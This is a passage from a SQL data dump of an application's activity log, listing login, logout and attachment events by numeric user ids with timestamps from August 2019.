10:38:30',NULL),(20140,2,'Attachment',556,'2019-08-17 10:38:31','2019-08-17 10:38:31',NULL),(20141,2,'Attachment',559,'2019-08-17 10:38:31','2019-08-17 10:38:31',NULL),(20142,2,'Attachment',557,'2019-08-17 10:38:31','2019-08-17 10:38:31',NULL),(20143,2,'Attachment',552,'2019-08-17 10:38:31','2019-08-17 10:38:31',NULL),(20144,2,'Attachment',550,'2019-08-17 10:38:31','2019-08-17 10:38:31',NULL),(20145,54,'Login',54,'2019-08-17 11:06:13','2019-08-17 11:06:13',NULL),(20146,2,'Attachment',757,'2019-08-17 14:10:26','2019-08-17 14:10:26',NULL),(20147,2,'Attachment',757,'2019-08-17 15:37:29','2019-08-17 15:37:29',NULL),(20148,54,'Logout',54,'2019-08-17 17:07:44','2019-08-17 17:07:44',NULL),(20149,2,'Attachment',757,'2019-08-17 17:07:46','2019-08-17 17:07:46',NULL),(20150,2,'Attachment',419,'2019-08-17 17:07:46','2019-08-17 17:07:46',NULL),(20151,2,'Attachment',416,'2019-08-17 17:07:46','2019-08-17 17:07:46',NULL),(20152,2,'Attachment',181,'2019-08-17 17:07:46','2019-08-17 17:07:46',NULL),(20153,2,'Attachment',288,'2019-08-17 17:07:47','2019-08-17 17:07:47',NULL),(20154,54,'Login',54,'2019-08-17 17:08:15','2019-08-17 17:08:15',NULL),(20155,2,'Attachment',181,'2019-08-19 08:12:40','2019-08-19 08:12:40',NULL),(20156,2,'Attachment',757,'2019-08-19 08:12:40','2019-08-19 08:12:40',NULL),(20157,2,'Attachment',416,'2019-08-19 08:12:40','2019-08-19 08:12:40',NULL),(20158,2,'Attachment',288,'2019-08-19 08:12:40','2019-08-19 08:12:40',NULL),(20159,2,'Attachment',419,'2019-08-19 08:12:40','2019-08-19 08:12:40',NULL),(20160,2,'Attachment',539,'2019-08-19 08:12:44','2019-08-19 08:12:44',NULL),(20161,2,'Attachment',541,'2019-08-19 08:12:44','2019-08-19 08:12:44',NULL),(20162,2,'Attachment',538,'2019-08-19 08:12:44','2019-08-19 08:12:44',NULL),(20163,2,'Attachment',535,'2019-08-19 08:12:44','2019-08-19 08:12:44',NULL),(20164,2,'Attachment',403,'2019-08-19 08:12:44','2019-08-19 08:12:44',NULL),(20165,1,'Login',1,'2019-08-19 08:13:28','2019-08-19 08:13:28',NULL),(20166,1,'Login',1,'2019-08-19 08:21:11','2019-08-19 08:21:11',NULL),(20167,2,'Attachment',757,'2019-08-19 08:27:38','2019-08-19 08:27:38',NULL),(20168,49,'Login',49,'2019-08-19 08:28:35','2019-08-19 08:28:35',NULL),(20169,49,'Attachment',506,'2019-08-19 09:19:50','2019-08-19 09:19:50',NULL),(20170,2,'Attachment',416,'2019-08-19 09:23:29','2019-08-19 09:23:29',NULL),(20171,2,'Attachment',419,'2019-08-19 09:23:29','2019-08-19 09:23:29',NULL),(20172,2,'Attachment',757,'2019-08-19 09:23:29','2019-08-19 09:23:29',NULL),(20173,2,'Attachment',288,'2019-08-19 09:23:29','2019-08-19 09:23:29',NULL),(20174,2,'Attachment',181,'2019-08-19 09:23:30','2019-08-19 09:23:30',NULL),(20175,49,'Attachment',549,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20176,49,'Attachment',547,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20177,49,'Attachment',548,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20178,49,'Attachment',552,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20179,49,'Attachment',551,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20180,49,'Attachment',553,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20181,49,'Attachment',550,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20182,49,'Attachment',555,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20183,49,'Attachment',556,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20184,49,'Attachment',559,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20185,49,'Attachment',554,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20186,49,'Attachment',557,'2019-08-19 09:24:46','2019-08-19 09:24:46',NULL),(20187,2,'Attachment',757,'2019-08-19 09:25:40','2019-08-19 09:25:40',NULL),(20188,53,'Login',53,'2019-08-19 09:47:14','2019-08-19 09:47:14',NULL),(20189,54,'Login',54,'2019-08-19 10:35:24','2019-08-19 10:35:24',NULL),(20190,2,'Attachment',757,'2019-08-19 14:15:30','2019-08-19 14:15:30',NULL),(20191,2,'Attachment',416,'2019-08-19 14:15:30','2019-08-19 14:15:30',NULL),(20192,2,'Attachment',288,'2019-08-19 14:15:31','2019-08-19 14:15:31',NULL),(20193,2,'Attachment',419,'2019-08-19 14:15:31','2019-08-19 14:15:31',NULL),(20194,2,'Attachment',181,'2019-08-19 14:15:31','2019-08-19 14:15:31',NULL),(20195,49,'Login',49,'2019-08-19 14:15:55','2019-08-19 14:15:55',NULL),(20196,49,'Attachment',419,'2019-08-19 14:18:55','2019-08-19 14:18:55',NULL),(20197,49,'Attachment',181,'2019-08-19 14:18:55','2019-08-19 14:18:55',NULL),(20198,49,'Attachment',288,'2019-08-19 14:18:55','2019-08-19 14:18:55',NULL),(20199,49,'Attachment',757,'2019-08-19 14:18:55','2019-08-19 14:18:55',NULL),(20200,49,'Attachment',416,'2019-08-19 14:18:55','2019-08-19 14:18:55',NULL),(20201,54,'Attachment',416,'2019-08-19 15:09:12','2019-08-19 15:09:12',NULL),(20202,54,'Attachment',757,'2019-08-19 15:09:12','2019-08-19 15:09:12',NULL),(20203,54,'Attachment',419,'2019-08-19 15:09:12','2019-08-19 15:09:12',NULL),(20204,54,'Attachment',288,'2019-08-19 15:09:12','2019-08-19 15:09:12',NULL),(20205,54,'Attachment',181,'2019-08-19 15:09:12','2019-08-19 15:09:12',NULL),(20206,54,'Logout',54,'2019-08-19 15:10:40','2019-08-19 15:10:40',NULL),(20207,49,'Login',49,'2019-08-19 15:10:51','2019-08-19 15:10:51',NULL),(20208,49,'Attachment',515,'2019-08-19 15:19:27','2019-08-19 15:19:27',NULL),(20209,49,'Attachment',508,'2019-08-19 15:19:42','2019-08-19 15:19:42',NULL),(20210,49,'Attachment',513,'2019-08-19 15:21:43','2019-08-19 15:21:43',NULL),(20211,49,'Attachment',512,'2019-08-19 15:26:12','2019-08-19 15:26:12',NULL),(20212,2,'Attachment',512,'2019-08-19 15:26:12','2019-08-19 15:26:12',NULL),(20213,49,'Logout',49,'2019-08-19 15:30:19','2019-08-19 15:30:19',NULL),(20214,54,'Login',54,'2019-08-19 15:30:23','2019-08-19 15:30:23',NULL),(20215,49,'Attachment',512,'2019-08-19 15:31:38','2019-08-19 15:31:38',NULL),(20216,49,'Attachment',512,'2019-08-19 15:31:39','2019-08-19 15:31:39',NULL),(20217,49,'Attachment',512,'2019-08-19 15:32:40','2019-08-19 15:32:40',NULL),(20218,49,'Logout',49,'2019-08-19 15:33:48','2019-08-19 15:33:48',NULL),(20219,46,'Login',46,'2019-08-19 15:34:08','2019-08-19 15:34:08',NULL),(20220,49,'Attachment',535,'2019-08-19 15:35:11','2019-08-19 15:35:11',NULL),(20221,49,'Attachment',753,'2019-08-19 15:35:11','2019-08-19 15:35:11',NULL),(20222,49,'Attachment',546,'2019-08-19 15:35:11','2019-08-19 15:35:11',NULL),(20223,49,'Attachment',538,'2019-08-19 15:35:12','2019-08-19 15:35:12',NULL),(20224,49,'Attachment',539,'2019-08-19 15:35:12','2019-08-19 15:35:12',NULL),(20225,49,'Attachment',755,'2019-08-19 15:35:12','2019-08-19 15:35:12',NULL),(20226,49,'Attachment',541,'2019-08-19 15:35:13','2019-08-19 15:35:13',NULL),(20227,46,'Login',46,'2019-08-19 15:35:14','2019-08-19 15:35:14',NULL),(20228,49,'Attachment',403,'2019-08-19 15:35:14','2019-08-19 15:35:14',NULL),(20229,49,'Attachment',354,'2019-08-19 15:35:14','2019-08-19 15:35:14',NULL),(20230,49,'Attachment',371,'2019-08-19 15:35:14','2019-08-19 15:35:14',NULL),(20231,49,'Attachment',69,'2019-08-19 15:35:14','2019-08-19 15:35:14',NULL),(20232,49,'Attachment',180,'2019-08-19 15:35:14','2019-08-19 15:35:14',NULL),(20233,46,'Logout',46,'2019-08-19 15:40:58','2019-08-19 15:40:58',NULL),(20234,2,'Attachment',757,'2019-08-19 15:40:59','2019-08-19 15:40:59',NULL),(20235,49,'Login',49,'2019-08-19 15:41:21','2019-08-19 15:41:21',NULL),(20236,54,'Logout',54,'2019-08-19 15:44:11','2019-08-19 15:44:11',NULL),(20237,46,'Login',46,'2019-08-19 15:44:26','2019-08-19 15:44:26',NULL),(20238,49,'Attachment',547,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20239,49,'Attachment',548,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20240,49,'Attachment',549,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20241,49,'Attachment',551,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20242,49,'Attachment',552,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20243,49,'Attachment',553,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20244,49,'Attachment',554,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20245,49,'Attachment',555,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20246,49,'Attachment',556,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20247,49,'Attachment',559,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20248,49,'Attachment',557,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20249,49,'Attachment',550,'2019-08-19 16:06:27','2019-08-19 16:06:27',NULL),(20250,26,'Login',26,'2019-08-19 16:48:14','2019-08-19 16:48:14',NULL),(20251,2,'Attachment',416,'2019-08-19 18:08:31','2019-08-19 18:08:31',NULL),(20252,2,'Attachment',419,'2019-08-19 18:08:31','2019-08-19 18:08:31',NULL),(20253,2,'Attachment',181,'2019-08-19 18:08:31','2019-08-19 18:08:31',NULL),(20254,2,'Attachment',757,'2019-08-20 09:45:30','2019-08-20 09:45:30',NULL),(20255,2,'Attachment',416,'2019-08-20 09:45:30','2019-08-20 09:45:30',NULL),(20256,2,'Attachment',288,'2019-08-20 09:45:30','2019-08-20 09:45:30',NULL),(20257,2,'Attachment',419,'2019-08-20 09:45:30','2019-08-20 09:45:30',NULL),(20258,2,'Attachment',181,'2019-08-20 09:45:30','2019-08-20 09:45:30',NULL),(20259,53,'Login',53,'2019-08-20 10:08:54','2019-08-20 10:08:54',NULL),(20260,50,'Login',50,'2019-08-20 13:57:21','2019-08-20 13:57:21',NULL),(20261,2,'Attachment',541,'2019-08-20 15:24:04','2019-08-20 15:24:04',NULL),(20262,2,'Attachment',538,'2019-08-20 15:24:04','2019-08-20 15:24:04',NULL),(20263,2,'Attachment',539,'2019-08-20 15:24:04','2019-08-20 15:24:04',NULL),(20264,2,'Attachment',535,'2019-08-20 15:24:04','2019-08-20 15:24:04',NULL),(20265,2,'Attachment',403,'2019-08-20 15:24:04','2019-08-20 15:24:04',NULL),(20266,2,'Attachment',757,'2019-08-20 15:26:24','2019-08-20 15:26:24',NULL),(20267,2,'Attachment',419,'2019-08-20 15:26:25','2019-08-20 15:26:25',NULL),(20268,2,'Attachment',416,'2019-08-20 15:26:25','2019-08-20 15:26:25',NULL),(20269,2,'Attachment',288,'2019-08-20 15:26:25','2019-08-20 15:26:25',NULL),(20270,2,'Attachment',181,'2019-08-20 15:26:25','2019-08-20 15:26:25',NULL),(20271,2,'Attachment',541,'2019-08-20 15:26:27','2019-08-20 15:26:27',NULL),(20272,2,'Attachment',539,'2019-08-20 15:26:27','2019-08-20 15:26:27',NULL),(20273,2,'Attachment',538,'2019-08-20 15:26:27','2019-08-20 15:26:27',NULL),(20274,2,'Attachment',535,'2019-08-20 15:26:27','2019-08-20 15:26:27',NULL),(20275,2,'Attachment',403,'2019-08-20 15:26:27','2019-08-20 15:26:27',NULL),(20276,2,'Attachment',371,'2019-08-20 15:26:28','2019-08-20 15:26:28',NULL),(20277,2,'Attachment',354,'2019-08-20 15:26:28','2019-08-20 15:26:28',NULL),(20278,2,'Attachment',69,'2019-08-20 15:26:28','2019-08-20 15:26:28',NULL),(20279,2,'Attachment',14,'2019-08-20 15:26:28','2019-08-20 15:26:28',NULL),(20280,2,'Attachment',180,'2019-08-20 15:26:28','2019-08-20 15:26:28',NULL),(20281,2,'Attachment',36,'2019-08-20 15:26:28','2019-08-20 15:26:28',NULL),(20282,2,'Attachment',29,'2019-08-20 15:26:28','2019-08-20 15:26:28',NULL),(20283,2,'Attachment',24,'2019-08-20 15:28:37','2019-08-20 15:28:37',NULL),(20284,54,'Login',54,'2019-08-20 15:53:43','2019-08-20 15:53:43',NULL),(20285,54,'Attachment',29,'2019-08-20 16:02:16','2019-08-20 16:02:16',NULL),(20286,54,'Attachment',24,'2019-08-20 16:02:17','2019-08-20 16:02:17',NULL),(20287,54,'Attachment',371,'2019-08-20 16:02:22','2019-08-20 16:02:22',NULL),(20288,54,'Attachment',354,'2019-08-20 16:02:22','2019-08-20 16:02:22',NULL),(20289,54,'Attachment',180,'2019-08-20 16:02:22','2019-08-20 16:02:22',NULL),(20290,54,'Attachment',69,'2019-08-20 16:02:22','2019-08-20 16:02:22',NULL),(20291,54,'Attachment',36,'2019-08-20 16:02:22','2019-08-20 16:02:22',NULL),(20292,54,'Attachment',14,'2019-08-20 16:02:23','2019-08-20 16:02:23',NULL),(20293,53,'Login',53,'2019-08-21 08:03:03','2019-08-21 08:03:03',NULL),(20294,2,'Attachment',29,'2019-08-21 11:04:37','2019-08-21 11:04:37',NULL),(20295,2,'Attachment',24,'2019-08-21 11:04:37','2019-08-21 11:04:37',NULL),(20296,2,'Attachment',538,'2019-08-21 11:04:40','2019-08-21 11:04:40',NULL),(20297,2,'Attachment',541,'2019-08-21 11:04:40','2019-08-21 11:04:40',NULL),(20298,2,'Attachment',539,'2019-08-21 11:04:40','2019-08-21 11:04:40',NULL),(20299,2,'Attachment',403,'2019-08-21 11:04:40','2019-08-21 11:04:40',NULL),(20300,2,'Attachment',535,'2019-08-21 11:04:40','2019-08-21 11:04:40',NULL),(20301,2,'Attachment',354,'2019-08-21 11:04:45','2019-08-21 11:04:45',NULL),(20302,2,'Attachment',180,'2019-08-21 11:04:45','2019-08-21 11:04:45',NULL),(20303,2,'Attachment',14,'2019-08-21 11:04:45','2019-08-21 11:04:45',NULL),(20304,2,'Attachment',69,'2019-08-21 11:04:45','2019-08-21 11:04:45',NULL),(20305,2,'Attachment',371,'2019-08-21 11:04:45','2019-08-21 11:04:45',NULL),(20306,2,'Attachment',36,'2019-08-21 11:04:45','2019-08-21 11:04:45',NULL),(20307,50,'Login',50,'2019-08-21 11:16:01','2019-08-21 11:16:01',NULL),(20308,50,'Attachment',524,'2019-08-21 11:16:15','2019-08-21 11:16:15',NULL),(20309,2,'Attachment',753,'2019-08-22 10:16:54','2019-08-22 10:16:54',NULL),(20310,50,'Login',50,'2019-08-22 10:17:44','2019-08-22 10:17:44',NULL),(20311,49,'Login',49,'2019-08-22 10:28:52','2019-08-22 10:28:52',NULL),(20312,49,'Logout',49,'2019-08-22 10:30:22','2019-08-22 10:30:22',NULL),(20313,2,'Attachment',757,'2019-08-22 10:30:22','2019-08-22 10:30:22',NULL),(20314,2,'Attachment',24,'2019-08-22 10:30:22','2019-08-22 10:30:22',NULL),(20315,2,'Attachment',419,'2019-08-22 10:30:22','2019-08-22 10:30:22',NULL),(20316,2,'Attachment',29,'2019-08-22 10:30:22','2019-08-22 10:30:22',NULL),(20317,2,'Attachment',288,'2019-08-22 10:30:22','2019-08-22 10:30:22',NULL),(20318,2,'Attachment',181,'2019-08-22 10:30:22','2019-08-22 10:30:22',NULL),(20319,2,'Attachment',416,'2019-08-22 10:30:22','2019-08-22 10:30:22',NULL),(20320,20,'Login',20,'2019-08-22 10:30:34','2019-08-22 10:30:34',NULL),(20321,20,'Logout',20,'2019-08-22 10:30:53','2019-08-22 10:30:53',NULL),(20322,20,'Login',20,'2019-08-22 10:31:20','2019-08-22 10:31:20',NULL),(20323,50,'Logout',50,'2019-08-22 10:36:42','2019-08-22 10:36:42',NULL),(20324,20,'Login',20,'2019-08-22 10:36:49','2019-08-22 10:36:49',NULL),(20325,20,'Logout',20,'2019-08-22 10:44:13','2019-08-22 10:44:13',NULL),(20326,50,'Login',50,'2019-08-22 10:44:21','2019-08-22 10:44:21',NULL),(20327,50,'Login',50,'2019-08-22 14:41:21','2019-08-22 14:41:21',NULL),(20328,53,'Login',53,'2019-08-23 10:09:51','2019-08-23 10:09:51',NULL),(20329,53,'Attachment',29,'2019-08-23 10:16:39','2019-08-23 10:16:39',NULL),(20330,53,'Attachment',757,'2019-08-23 10:16:39','2019-08-23 10:16:39',NULL),(20331,53,'Attachment',416,'2019-08-23 10:16:40','2019-08-23 10:16:40',NULL),(20332,53,'Attachment',24,'2019-08-23 10:16:40','2019-08-23 10:16:40',NULL),(20333,53,'Attachment',419,'2019-08-23 10:16:40','2019-08-23 10:16:40',NULL),(20334,53,'Attachment',288,'2019-08-23 10:16:40','2019-08-23 10:16:40',NULL),(20335,50,'Login',50,'2019-08-23 12:48:29','2019-08-23 12:48:29',NULL),(20336,49,'Login',49,'2019-08-23 12:52:11','2019-08-23 12:52:11',NULL),(20337,49,'Logout',49,'2019-08-23 12:53:16','2019-08-23 12:53:16',NULL),(20338,2,'Attachment',29,'2019-08-23 12:53:16','2019-08-23 12:53:16',NULL),(20339,2,'Attachment',181,'2019-08-23 12:53:16','2019-08-23 12:53:16',NULL),(20340,2,'Attachment',288,'2019-08-23 12:53:16','2019-08-23 12:53:16',NULL),(20341,2,'Attachment',416,'2019-08-23 12:53:16','2019-08-23 12:53:16',NULL),(20342,2,'Attachment',24,'2019-08-23 12:53:16','2019-08-23 12:53:16',NULL),(20343,2,'Attachment',757,'2019-08-23 12:53:16','2019-08-23 12:53:16',NULL),(20344,2,'Attachment',419,'2019-08-23 12:53:16','2019-08-23 12:53:16',NULL),(20345,20,'Login',20,'2019-08-23 12:53:28','2019-08-23 12:53:28',NULL),(20346,50,'Login',50,'2019-08-23 14:10:33','2019-08-23 14:10:33',NULL),(20347,50,'Logout',50,'2019-08-23 14:12:21','2019-08-23 14:12:21',NULL),(20348,2,'Attachment',757,'2019-08-23 14:12:21','2019-08-23 14:12:21',NULL),(20349,2,'Attachment',29,'2019-08-23 14:12:21','2019-08-23 14:12:21',NULL),(20350,2,'Attachment',419,'2019-08-23 14:12:21','2019-08-23 14:12:21',NULL),(20351,2,'Attachment',24,'2019-08-23 14:12:21','2019-08-23 14:12:21',NULL),(20352,2,'Attachment',416,'2019-08-23 14:12:21','2019-08-23 14:12:21',NULL),(20353,2,'Attachment',288,'2019-08-23 14:12:21','2019-08-23 14:12:21',NULL),(20354,2,'Attachment',181,'2019-08-23 14:12:21','2019-08-23 14:12:21',NULL),(20355,20,'Login',20,'2019-08-23 14:12:36','2019-08-23 14:12:36',NULL),(20356,20,'Logout',20,'2019-08-23 14:28:50','2019-08-23 14:28:50',NULL),(20357,53,'Login',53,'2019-08-23 14:29:13','2019-08-23 14:29:13',NULL),(20358,50,'Logout',50,'2019-08-23 15:05:58','2019-08-23 15:05:58',NULL),(20359,20,'Login',20,'2019-08-23 15:06:08','2019-08-23 15:06:08',NULL),(20360,20,'Logout',20,'2019-08-23 15:09:04','2019-08-23 15:09:04',NULL),(20361,50,'Login',50,'2019-08-23 15:09:13','2019-08-23 15:09:13',NULL),(20362,20,'Logout',20,'2019-08-23 15:15:02','2019-08-23 15:15:02',NULL),(20363,49,'Login',49,'2019-08-23 15:15:12','2019-08-23 15:15:12',NULL),(20364,2,'Attachment',757,'2019-08-23 15:52:45','2019-08-23 15:52:45',NULL),(20365,2,'Attachment',24,'2019-08-23 15:52:45','2019-08-23 15:52:45',NULL),(20366,2,'Attachment',288,'2019-08-23 15:52:46','2019-08-23 15:52:46',NULL),(20367,2,'Attachment',29,'2019-08-23 15:52:46','2019-08-23 15:52:46',NULL),(20368,2,'Attachment',419,'2019-08-23 15:52:46','2019-08-23 15:52:46',NULL),(20369,2,'Attachment',181,'2019-08-23 15:52:46','2019-08-23 15:52:46',NULL),(20370,2,'Attachment',416,'2019-08-23 15:52:46','2019-08-23 15:52:46',NULL),(20371,20,'Login',20,'2019-08-23 15:52:52','2019-08-23 15:52:52',NULL),(20372,53,'Attachment',753,'2019-08-23 16:37:46','2019-08-23 16:37:46',NULL),(20373,53,'Attachment',546,'2019-08-23 16:37:46','2019-08-23 16:37:46',NULL),(20374,53,'Attachment',535,'2019-08-23 16:37:46','2019-08-23 16:37:46',NULL),(20375,53,'Logout',53,'2019-08-23 17:08:48','2019-08-23 17:08:48',NULL),(20376,2,'Attachment',757,'2019-08-23 17:08:48','2019-08-23 17:08:48',NULL),(20377,2,'Attachment',29,'2019-08-23 17:08:48','2019-08-23 17:08:48',NULL),(20378,2,'Attachment',24,'2019-08-23 17:08:48','2019-08-23 17:08:48',NULL),(20379,2,'Attachment',416,'2019-08-23 17:08:48','2019-08-23 17:08:48',NULL),(20380,2,'Attachment',181,'2019-08-23 17:08:48','2019-08-23 17:08:48',NULL),(20381,2,'Attachment',288,'2019-08-23 17:08:48','2019-08-23 17:08:48',NULL),(20382,2,'Attachment',419,'2019-08-23 17:08:48','2019-08-23 17:08:48',NULL),(20383,53,'Login',53,'2019-08-23 17:09:28','2019-08-23 17:09:28',NULL),(20384,53,'Attachment',757,'2019-08-23 17:09:36','2019-08-23 17:09:36',NULL),(20385,53,'Attachment',29,'2019-08-23 17:09:36','2019-08-23 17:09:36',NULL),(20386,53,'Login',53,'2019-08-24 14:50:35','2019-08-24 14:50:35',NULL),(20387,53,'Logout',53,'2019-08-24 14:50:52','2019-08-24 14:50:52',NULL),(20388,50,'Login',50,'2019-08-24 14:50:57','2019-08-24 14:50:57',NULL),(20389,20,'Login',20,'2019-08-24 15:45:05','2019-08-24 15:45:05',NULL),(20390,20,'Logout',20,'2019-08-24 19:59:34','2019-08-24 19:59:34',NULL),(20391,50,'Login',50,'2019-08-24 19:59:54','2019-08-24 19:59:54',NULL),(20392,2,'Attachment',757,'2019-08-25 12:07:26','2019-08-25 12:07:26',NULL),(20393,2,'Attachment',419,'2019-08-25 12:07:27','2019-08-25 12:07:27',NULL),(20394,2,'Attachment',29,'2019-08-25 12:07:27','2019-08-25 12:07:27',NULL),(20395,2,'Attachment',24,'2019-08-25 12:07:27','2019-08-25 12:07:27',NULL),(20396,2,'Attachment',288,'2019-08-25 12:07:27','2019-08-25 12:07:27',NULL),(20397,2,'Attachment',181,'2019-08-25 12:07:27','2019-08-25 12:07:27',NULL),(20398,49,'Login',49,'2019-08-25 12:07:49','2019-08-25 12:07:49',NULL),(20399,49,'Logout',49,'2019-08-25 12:16:48','2019-08-25 12:16:48',NULL),(20400,2,'Attachment',757,'2019-08-25 12:16:48','2019-08-25 12:16:48',NULL),(20401,2,'Attachment',29,'2019-08-25 12:16:48','2019-08-25 12:16:48',NULL),(20402,46,'Login',46,'2019-08-25 12:17:12','2019-08-25 12:17:12',NULL),(20403,2,'Attachment',419,'2019-08-25 13:49:10','2019-08-25 13:49:10',NULL),(20404,2,'Attachment',29,'2019-08-25 13:49:10','2019-08-25 13:49:10',NULL),(20405,2,'Attachment',416,'2019-08-25 13:49:10','2019-08-25 13:49:10',NULL),(20406,2,'Attachment',181,'2019-08-25 13:49:10','2019-08-25 13:49:10',NULL),(20407,2,'Attachment',24,'2019-08-25 13:49:10','2019-08-25 13:49:10',NULL),(20408,2,'Attachment',757,'2019-08-25 13:49:10','2019-08-25 13:49:10',NULL),(20409,2,'Attachment',288,'2019-08-25 13:49:11','2019-08-25 13:49:11',NULL),(20410,54,'Login',54,'2019-08-26 08:58:10','2019-08-26 08:58:10',NULL),(20411,50,'Login',50,'2019-08-26 09:06:03','2019-08-26 09:06:03',NULL),(20412,26,'Login',26,'2019-08-26 09:07:50','2019-08-26 09:07:50',NULL),(20413,46,'Login',46,'2019-08-26 09:09:21','2019-08-26 09:09:21',NULL),(20414,50,'Login',50,'2019-08-26 09:27:20','2019-08-26 09:27:20',NULL),(20415,20,'Login',20,'2019-08-26 09:33:06','2019-08-26 09:33:06',NULL),(20416,20,'Logout',20,'2019-08-26 09:41:17','2019-08-26 09:41:17',NULL),(20417,2,'Attachment',29,'2019-08-26 09:41:17','2019-08-26 09:41:17',NULL),(20418,2,'Attachment',419,'2019-08-26 09:41:17','2019-08-26 09:41:17',NULL),(20419,2,'Attachment',416,'2019-08-26 09:41:17','2019-08-26 09:41:17',NULL),(20420,2,'Attachment',181,'2019-08-26 09:41:17','2019-08-26 09:41:17',NULL),(20421,2,'Attachment',24,'2019-08-26 09:41:18','2019-08-26 09:41:18',NULL),(20422,2,'Attachment',288,'2019-08-26 09:41:18','2019-08-26 09:41:18',NULL),(20423,2,'Attachment',757,'2019-08-26 09:41:18','2019-08-26 09:41:18',NULL),(20424,49,'Login',49,'2019-08-26 09:41:32','2019-08-26 09:41:32',NULL),(20425,49,'Logout',49,'2019-08-26 09:58:04','2019-08-26 09:58:04',NULL),(20426,20,'Login',20,'2019-08-26 09:58:19','2019-08-26 09:58:19',NULL),(20427,20,'Logout',20,'2019-08-26 10:14:08','2019-08-26 10:14:08',NULL),(20428,52,'Login',52,'2019-08-26 10:14:44','2019-08-26 10:14:44',NULL),(20429,52,'Logout',52,'2019-08-26 10:27:25','2019-08-26 10:27:25',NULL),(20430,49,'Login',49,'2019-08-26 10:27:39','2019-08-26 10:27:39',NULL),(20431,49,'Logout',49,'2019-08-26 10:32:52','2019-08-26 10:32:52',NULL),(20432,20,'Login',20,'2019-08-26 10:33:05','2019-08-26 10:33:05',NULL),(20433,20,'Logout',20,'2019-08-26 10:42:15','2019-08-26 10:42:15',NULL),(20434,49,'Login',49,'2019-08-26 10:42:26','2019-08-26 10:42:26',NULL),(20435,49,'Logout',49,'2019-08-26 10:46:51','2019-08-26 10:46:51',NULL),(20436,20,'Login',20,'2019-08-26 10:47:03','2019-08-26 10:47:03',NULL),(20437,20,'Logout',20,'2019-08-26 10:56:11','2019-08-26 10:56:11',NULL),(20438,49,'Login',49,'2019-08-26 10:56:23','2019-08-26 10:56:23',NULL),(20439,54,'Attachment',541,'2019-08-26 15:55:34','2019-08-26 15:55:34',NULL),(20440,54,'Attachment',539,'2019-08-26 15:55:34','2019-08-26 15:55:34',NULL),(20441,54,'Attachment',538,'2019-08-26 15:55:34','2019-08-26 15:55:34',NULL),(20442,54,'Attachment',403,'2019-08-26 15:55:34','2019-08-26 15:55:34',NULL),(20443,54,'Attachment',535,'2019-08-26 15:55:34','2019-08-26 15:55:34',NULL),(20444,26,'Login',26,'2019-08-26 16:08:30','2019-08-26 16:08:30',NULL),(20445,46,'Login',46,'2019-08-27 09:14:23','2019-08-27 09:14:23',NULL),(20446,46,'Login',46,'2019-08-28 10:17:50','2019-08-28 10:17:50',NULL),(20447,2,'Attachment',757,'2019-08-28 17:11:33','2019-08-28 17:11:33',NULL),(20448,2,'Attachment',29,'2019-08-28 17:11:33','2019-08-28 17:11:33',NULL),(20449,2,'Attachment',24,'2019-08-28 17:11:33','2019-08-28 17:11:33',NULL),(20450,2,'Attachment',416,'2019-08-28 17:11:33','2019-08-28 17:11:33',NULL),(20451,2,'Attachment',419,'2019-08-28 17:11:33','2019-08-28 17:11:33',NULL),(20452,2,'Attachment',288,'2019-08-28 17:11:33','2019-08-28 17:11:33',NULL),(20453,2,'Attachment',181,'2019-08-28 17:11:33','2019-08-28 17:11:33',NULL),(20454,50,'Login',50,'2019-08-28 17:11:38','2019-08-28 17:11:38',NULL),(20455,2,'Attachment',757,'2019-08-29 14:33:14','2019-08-29 14:33:14',NULL),(20456,2,'Attachment',416,'2019-08-29 14:33:14','2019-08-29 14:33:14',NULL),(20457,2,'Attachment',29,'2019-08-29 14:33:14','2019-08-29 14:33:14',NULL),(20458,2,'Attachment',288,'2019-08-29 14:33:14','2019-08-29 14:33:14',NULL),(20459,2,'Attachment',419,'2019-08-29 14:33:15','2019-08-29 14:33:15',NULL),(20460,2,'Attachment',24,'2019-08-29 14:33:15','2019-08-29 14:33:15',NULL),(20461,2,'Attachment',181,'2019-08-29 14:33:15','2019-08-29 14:33:15',NULL),(20462,50,'Login',50,'2019-08-29 14:33:18','2019-08-29 14:33:18',NULL),(20463,2,'Attachment',757,'2019-08-29 20:42:57','2019-08-29 20:42:57',NULL),(20464,2,'Attachment',24,'2019-08-29 20:42:57','2019-08-29 20:42:57',NULL),(20465,2,'Attachment',29,'2019-08-29 20:42:57','2019-08-29 20:42:57',NULL),(20466,2,'Attachment',416,'2019-08-29 20:42:57','2019-08-29 20:42:57',NULL),(20467,2,'Attachment',419,'2019-08-29 20:42:57','2019-08-29 20:42:57',NULL),(20468,2,'Attachment',288,'2019-08-29 20:42:57','2019-08-29 20:42:57',NULL),(20469,2,'Attachment',181,'2019-08-29 20:42:57','2019-08-29 20:42:57',NULL),(20470,2,'Attachment',538,'2019-08-29 20:43:01','2019-08-29 20:43:01',NULL),(20471,2,'Attachment',757,'2019-08-30 16:14:04','2019-08-30 16:14:04',NULL),(20472,2,'Attachment',24,'2019-08-30 16:14:04','2019-08-30 16:14:04',NULL),(20473,2,'Attachment',29,'2019-08-30 16:14:04','2019-08-30 16:14:04',NULL),(20474,2,'Attachment',288,'2019-08-30 16:14:29','2019-08-30 16:14:29',NULL),(20475,2,'Attachment',419,'2019-08-30 16:14:29','2019-08-30 16:14:29',NULL),(20476,2,'Attachment',416,'2019-08-30 